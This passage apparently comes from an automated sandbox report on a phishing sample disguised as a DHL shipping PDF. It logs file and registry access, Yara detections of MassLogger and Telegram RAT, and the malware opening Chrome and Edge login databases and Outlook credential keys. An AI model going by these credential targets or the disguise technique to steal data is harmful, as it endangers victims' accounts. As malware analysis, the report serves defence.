Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2179384145.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2179488891.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 5608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
